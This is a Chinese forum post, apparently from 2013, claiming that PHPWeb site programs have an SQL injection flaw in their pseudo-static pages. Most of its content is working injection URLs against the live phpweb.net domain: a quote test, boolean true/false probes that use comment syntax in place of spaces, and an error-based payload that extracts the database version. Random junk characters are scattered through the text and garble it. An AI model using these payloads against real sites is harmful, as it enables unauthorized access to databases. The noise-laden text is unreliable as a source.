phpweb所有的整站程序伪静态页面都存在sql注入
2 v$ M4 q u) C5 u3 \* [& o1 h
主站:http://phpweb.net/2 K! S! S4 ~! ^' F* N( n, f
加’检测:5 p6 G) |- m2 @( v
4 _0 F, E4 s% n0 K6 U1 c [http://www.phpweb.net/down/html/?772′.html
# O* b" t1 r/ ]5 e! E0 E9 ]
1 [! Y3 H( f2 e, `( T! ?出错
' L* z2 ]7 ^2 @, s$ Q% f( Q# }9 s存在注入。
5 F, N- {" }+ I不能用空格,只能用/*罗9 }( @. V5 p. B
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
: x8 l$ l8 n% i/ C2 a ; M! h6 f& d8 m4 S7 Y9 d- f
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错. I# C5 Q, w j0 R/ [+ T
爆数据库版本:% n) s, r h. F! N4 c. n* [
9 z$ O. n, `4 ]& t2 j?# S" E& f1 f" Y W; x1 T
18 B' @) U5 I7 w `5 V# W3 ]
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html: v) l0 I; R! ^ d& v. L
更新日期: 2013-01-03 13:39:50
: M4 G7 ?8 u% s% k7 x |
发表于 2013-1-4 19:46:42
收藏
支持
反对